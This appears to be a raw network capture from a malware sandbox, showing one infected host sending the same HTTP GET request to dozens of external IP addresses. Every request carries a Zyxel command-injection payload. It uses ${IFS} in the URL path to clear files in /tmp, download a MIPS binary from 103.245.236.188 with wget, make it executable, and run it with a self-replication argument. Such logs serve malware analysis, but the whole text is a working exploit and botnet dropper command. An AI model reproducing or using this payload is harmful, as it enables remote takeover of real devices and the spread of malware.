                                                Jan 12, 2024 18:24:48.149624109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7498192.168.2.1336894184.181.217.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149665117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7499192.168.2.1333126116.9.157.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149708986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7500192.168.2.1347036136.163.34.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149763107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7501192.168.2.1359676148.60.134.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149799109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7502192.168.2.135578038.17.48.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149847031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7503192.168.2.134006674.177.205.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149899006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7504192.168.2.1343954180.159.166.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149925947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7505192.168.2.133777494.70.143.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149960041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7506192.168.2.133679438.123.167.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149992943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7507192.168.2.134821672.127.158.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150043964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7508192.168.2.1342090106.250.158.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150084019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7509192.168.2.133637050.46.226.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150090933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7510192.168.2.1353114171.25.66.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150151014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7511192.168.2.135693284.116.211.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150187016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7512192.168.2.1348348164.1.83.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150243044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7513192.168.2.134372842.173.200.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150274038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7514192.168.2.1354086123.78.23.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150311947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7515192.168.2.1352678195.250.177.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150355101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7516192.168.2.135876227.153.197.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150392056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7517192.168.2.1352264216.33.224.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150410891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7518192.168.2.1345302219.181.140.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150465965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7519192.168.2.1339958223.50.69.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150485992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7520192.168.2.1333862160.247.158.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150533915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7521192.168.2.1354524216.74.37.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150564909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7522192.168.2.1356460191.206.69.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150630951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7523192.168.2.1339172116.236.227.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150650024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7524192.168.2.133281639.35.204.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150717020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7525192.168.2.135600861.197.253.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150738001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7526192.168.2.1334204110.146.125.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150790930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7527192.168.2.133407235.11.196.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150837898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7528192.168.2.1336304200.239.243.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150862932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7529192.168.2.1359126188.100.187.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150911093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7530192.168.2.1345136180.115.47.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150958061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7531192.168.2.1343972172.114.181.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.150976896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7532192.168.2.1338668179.169.203.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151040077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7533192.168.2.135857463.143.5.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151052952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7534192.168.2.1352436159.144.10.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151108027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7535192.168.2.133360471.144.106.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151144981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7536192.168.2.1338896101.153.246.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151177883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7537192.168.2.133527061.234.123.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151237965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7538192.168.2.135451267.151.43.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151268959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7539192.168.2.1347946171.210.196.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151316881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7540192.168.2.1335548131.207.138.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151357889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7541192.168.2.1334212188.20.227.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151415110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7542192.168.2.1351718116.137.211.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151457071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7543192.168.2.1335406141.34.200.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151484013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7544192.168.2.1359480187.156.11.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151536942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7545192.168.2.1349254133.197.213.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151551962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7546192.168.2.135144449.99.115.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151575089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7547192.168.2.135932449.172.16.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151624918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7548192.168.2.134078612.235.115.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151632071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7549192.168.2.135658627.149.102.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151680946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7550192.168.2.1343660188.104.20.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151722908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7551192.168.2.1340730117.215.73.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151751041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7552192.168.2.1339888167.109.165.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151810884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7553192.168.2.1358356103.214.150.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151855946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7554192.168.2.135630085.157.126.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151885986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7555192.168.2.1347648157.34.224.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151943922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7556192.168.2.134796644.89.156.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.151990891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7557192.168.2.13544222.54.40.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152034044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7558192.168.2.133722041.104.253.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152079105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7559192.168.2.133366664.192.244.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.152112961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7560192.168.2.1349608200.92.49.19443
                                                TimestampBytes transferredDirectionData
